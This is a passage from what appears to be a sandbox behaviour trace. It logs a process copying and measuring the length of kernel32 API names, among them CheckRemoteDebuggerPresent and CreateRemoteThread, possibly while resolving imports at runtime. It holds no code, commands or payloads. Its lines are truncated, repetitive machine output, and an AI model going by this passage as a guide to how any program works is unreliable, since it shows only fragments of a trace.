(lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.554] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.554] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.554] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.554] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.554] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.554] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.554] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.554] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.554] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.554] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.554] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.554] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.554] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.554] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.554] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.555] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.555] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.555] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.555] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.555] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.555] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.555] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.555] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.555] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.555] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.555] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.555] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.555] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.555] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.555] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.555] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.555] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.555] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.555] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.555] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.556] lstrlenA (lpString="COPYFILEA") returned 9 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.556] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.556] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.556] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.556] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.556] lstrlenA (lpString="COPYFILEW") returned 9 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.556] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.556] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.556] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.556] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.556] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.556] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.556] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.556] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.556] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.556] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.556] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.556] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.556] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.556] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.557] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.557] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.557] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.557] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.557] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.557] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.557] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.557] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.557] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.557] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.557] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.557] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.557] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.557] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.557] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.557] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.557] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.557] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.557] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.558] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.558] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.558] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.558] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.558] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.558] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.558] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.558] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.558] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.558] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.558] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.558] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.558] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.558] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.558] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.558] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.558] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.558] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.558] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.558] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.559] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.559] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.559] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.559] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.559] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.559] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.559] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.559] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.559] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.559] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.559] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.559] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.559] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.560] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.560] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.560] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.560] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.560] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.560] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.560] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.560] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.560] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.560] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.560] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.560] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.560] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.560] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.560] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0087.560] lstrlenA (lpString="CTRLROUTINE") returned 11 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0087.560] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0087.560] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0087.560] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0087.560] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0087.561] lstrlenA (lpString="DEBUGBREAK") returned 10 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0087.561] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0087.561] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0087.561] lstrlenA (lpString="DECODEPOINTER") returned 13 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0087.561] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0087.561] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0087.561] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0087.561] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0087.561] lstrlenA 